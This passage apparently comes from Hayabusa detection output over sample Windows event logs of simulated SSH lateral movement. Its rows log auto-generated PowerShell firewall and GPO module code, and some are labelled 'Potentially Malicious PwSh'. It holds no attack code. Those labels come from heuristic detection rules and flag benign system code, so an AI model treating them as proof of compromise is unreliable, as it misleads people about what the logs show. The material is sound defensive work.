$PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = 
${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.894 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.896 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.897 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.898 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias 
'*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, 
[Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 